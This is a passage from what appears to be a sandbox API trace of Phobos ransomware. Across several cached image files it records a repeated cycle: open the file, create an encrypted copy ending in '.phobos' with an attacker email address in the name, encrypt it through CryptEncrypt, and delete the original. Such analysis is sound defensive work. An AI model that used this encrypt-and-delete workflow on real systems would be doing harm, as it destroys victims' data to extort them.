Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0D8i[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0d8i[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0178.313] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0178.313] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0178.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0D8i[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0d8i[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0178.313] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0178.313] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0178.313] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x751, lpOverlapped=0x0) returned 1 [0178.396] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x760, dwBufLen=0x760 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x760) returned 1 [0178.396] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x760, lpOverlapped=0x0) returned 1 [0178.398] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0178.398] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0178.398] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0178.398] CryptDestroyKey (hKey=0xa327e8) returned 1 [0178.398] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0178.398] CryptDestroyKey (hKey=0xa32d28) returned 1 [0178.398] CloseHandle (hObject=0x14c) returned 1 [0178.398] CloseHandle (hObject=0x178) returned 1 [0178.398] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0D8i[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0d8i[1].jpg")) returned 1 [0178.399] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0178.399] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0w1b[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0w1b[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0178.400] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=7627) returned 1 [0178.400] CloseHandle (hObject=0x178) returned 1 [0178.400] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0w1b[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0w1b[1].jpg")) returned 0x2020 [0178.400] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0w1b[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0w1b[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0w1b[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0w1b[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0178.401] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0178.401] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0178.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0w1b[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0w1b[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0178.401] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0178.401] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0178.402] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1dcb, lpOverlapped=0x0) returned 1 [0178.887] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1dd0, dwBufLen=0x1dd0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1dd0) returned 1 [0178.887] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1dd0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1dd0, lpOverlapped=0x0) returned 1 [0178.888] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0178.888] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0178.888] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0178.888] CryptDestroyKey (hKey=0xa32c68) returned 1 [0178.888] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0178.888] CryptDestroyKey (hKey=0xa32d28) returned 1 [0178.888] CloseHandle (hObject=0x178) returned 1 [0178.888] CloseHandle (hObject=0x14c) returned 1 [0178.888] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0w1b[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0w1b[1].jpg")) returned 1 [0178.889] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0178.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBDWA22[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbdwa22[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0178.890] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2904) returned 1 [0178.890] CloseHandle (hObject=0x14c) returned 1 [0178.890] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBDWA22[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbdwa22[1].jpg")) returned 0x2020 [0178.891] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBDWA22[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbdwa22[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBDWA22[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbdwa22[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0178.891] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0178.891] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0178.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBDWA22[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbdwa22[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0178.892] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0178.892] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0178.892] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb58, lpOverlapped=0x0) returned 1 [0178.984] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb60, dwBufLen=0xb60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb60) returned 1 [0178.984] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb60, lpOverlapped=0x0) returned 1 [0178.985] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0178.985] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0178.985] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0178.985] CryptDestroyKey (hKey=0xa32c68) returned 1 [0178.985] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0178.985] CryptDestroyKey (hKey=0xa32d28) returned 1 [0178.985] CloseHandle (hObject=0x14c) returned 1 [0178.985] CloseHandle (hObject=0x178) returned 1 [0178.985] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBDWA22[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbdwa22[1].jpg")) returned 1 [0178.986] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0178.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdMci[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedmci[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0179.007] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2814) returned 1 [0179.007] CloseHandle (hObject=0x178) returned 1 [0179.007] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdMci[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedmci[1].jpg")) returned 0x2020 [0179.007] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdMci[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedmci[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdMci[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedmci[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0179.007] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.007] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdMci[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedmci[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0179.008] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0179.008] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.008] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xafe, lpOverlapped=0x0) returned 1 [0179.179] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb00, dwBufLen=0xb00 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb00) returned 1 [0179.179] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb00, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb00, lpOverlapped=0x0) returned 1 [0179.180] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0179.181] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.181] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0179.181] CryptDestroyKey (hKey=0xa32c28) returned 1 [0179.181] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0179.181] CryptDestroyKey (hKey=0xa32d28) returned 1 [0179.181] CloseHandle (hObject=0x178) returned 1 [0179.181] CloseHandle (hObject=0x14c) returned 1 [0179.181] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdMci[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedmci[1].jpg")) returned 1 [0179.182] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0179.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdSLV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedslv[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0179.182] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=10824) returned 1 [0179.182] CloseHandle (hObject=0x14c) returned 1 [0179.182] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdSLV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedslv[1].jpg")) returned 0x2020 [0179.182] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdSLV[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedslv[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdSLV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedslv[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0179.183] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.183] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdSLV[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedslv[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0179.183] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0179.183] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.183] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2a48, lpOverlapped=0x0) returned 1 [0179.193] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2a50, dwBufLen=0x2a50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2a50) returned 1 [0179.193] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2a50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2a50, lpOverlapped=0x0) returned 1 [0179.194] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0179.194] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.194] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0179.194] CryptDestroyKey (hKey=0xa32c28) returned 1 [0179.194] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0179.194] 